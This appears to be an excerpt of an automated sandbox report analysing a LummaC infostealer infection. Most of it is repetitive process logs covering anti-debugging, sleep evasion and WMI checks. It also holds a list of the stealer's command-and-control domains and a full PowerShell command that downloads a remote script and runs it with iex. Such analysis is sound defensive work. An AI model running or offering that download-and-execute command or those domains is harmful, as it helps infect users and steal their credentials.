Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8719			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1162			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep count: 8719 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep count: 1162 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8176	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 7308	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: PrivacyDrive.exe, 00000010.00000002.1578947957.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWy
Source: PrivacyDrive.exe, 00000010.00000003.1521249924.00000000016CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: PrivacyDrive.exe, 00000010.00000002.1579534650.0000000001798000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

API call chain: ExitProcess graph end node

graph_16-46581

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Code function: 16_2_05A06730 LdrInitializeThunk,

16_2_05A06730

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C055F mov edx, dword ptr fs:[00000030h]	16_2_047C055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C0B1F mov eax, dword ptr fs:[00000030h]	16_2_047C0B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C116E mov eax, dword ptr fs:[00000030h]	16_2_047C116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C116F mov eax, dword ptr fs:[00000030h]	16_2_047C116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe	Code function: 16_2_047C0ECF mov eax, dword ptr fs:[00000030h]	16_2_047C0ECF

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: PrivacyDrive.exe	String found in binary or memory: deallyharvenw.shop
Source: PrivacyDrive.exe	String found in binary or memory: priooozekw.shop
Source: PrivacyDrive.exe	String found in binary or memory: racedsuitreow.shop
Source: PrivacyDrive.exe	String found in binary or memory: defenddsouneuw.shop
Source: PrivacyDrive.exe	String found in binary or memory: candleduseiwo.shop
Source: PrivacyDrive.exe	String found in binary or memory: surroundeocw.shop
Source: PrivacyDrive.exe	String found in binary or memory: covvercilverow.shop
Source: PrivacyDrive.exe	String found in binary or memory: pumpkinkwquo.shop
Source: PrivacyDrive.exe	String found in binary or memory: abortinoiwiam.shop

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
